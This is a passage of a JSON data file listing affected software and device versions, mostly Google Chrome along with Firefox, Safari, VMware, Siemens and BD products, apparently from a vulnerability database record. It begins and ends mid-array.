      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.81"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "60.0.3112.80"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.22"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.112"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.32"
      },
      {
        "_id": null,
        "model": "rowa dose",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.716.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.480.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.45"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.700.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.28"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.154"
      },
      {
        "_id": null,
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1684.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.82"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1652.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.24"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.68"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.627.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.69"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.826.0"
      },
      {
        "_id": null,
        "model": "identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "2.7"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.581.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.1"
      },
      {
        "_id": null,
        "model": "focal point solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "-0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.544.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1.2"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.130"
      },
      {
        "_id": null,
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.5.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1041"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.336.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.5"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.10"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.11"
      },
      {
        "_id": null,
        "model": "simatic s7-1518-4 pn/dp odk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "52.0.2743.82"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.113"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.124"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1295.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.67"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.922.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.113"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.65"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.42"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.638.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1049.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.219"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "41.0.2272.118"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.910.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.149"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1686.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.90"
      },
      {
        "_id": null,
        "model": "simatic ipc427d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.671.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.69"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.366.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1055.1"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "50.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.68"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.84"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.66"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.424.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.39"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.6"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.2"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.898.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.478.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.107"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.100"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.465.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.540.0"
      },
      {
        "_id": null,
        "model": "facspresto",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.57"
      },
      {
        "_id": null,
        "model": "vsphere integrated containers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.46"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2.5"
      },
      {
        "_id": null,
        "model": "sql server for 32-bit systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20123"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1004.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.23"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.136"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.76"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.935.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.821.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.212.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.45"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.32"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.492.0"
      },
      {
        "_id": null,
        "model": "tvos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.33"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.923.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.46"
      },
      {
        "_id": null,
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "42.0.2311"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.16"
      },
      {
        "_id": null,
        "model": "windows for 32-bit systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.547.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.536.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.57"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.41"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.948.0"
      },
      {
        "_id": null,
        "model": "sql server for x64-based systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20123"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.74"
      },
      {
        "_id": null,
        "model": "enterprise linux for ibm z systems extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.30"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.49"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.63"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "16.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.114"
      },
      {
        "_id": null,
        "model": "pyxis duostation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1024.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.45"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.784.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.29"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.2.149.30"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.44"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.80"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.16"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.15"
      },
      {
        "_id": null,
        "model": "windows server for 32-bit systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.90"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "46.0.2490.86"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1017.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.92"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.84"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.95"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.683.0"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.74"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.70"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.97"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.425.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.486.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "35.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.747.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.450.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.4"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.333"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.775.2"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1.1"
      },
      {
        "_id": null,
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1017090"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.99"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1077.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.27"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1300.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.32"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.2"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.64"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.889.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1028"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.33"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.133"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.61"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.773.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.26"
      },
      {
        "_id": null,
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
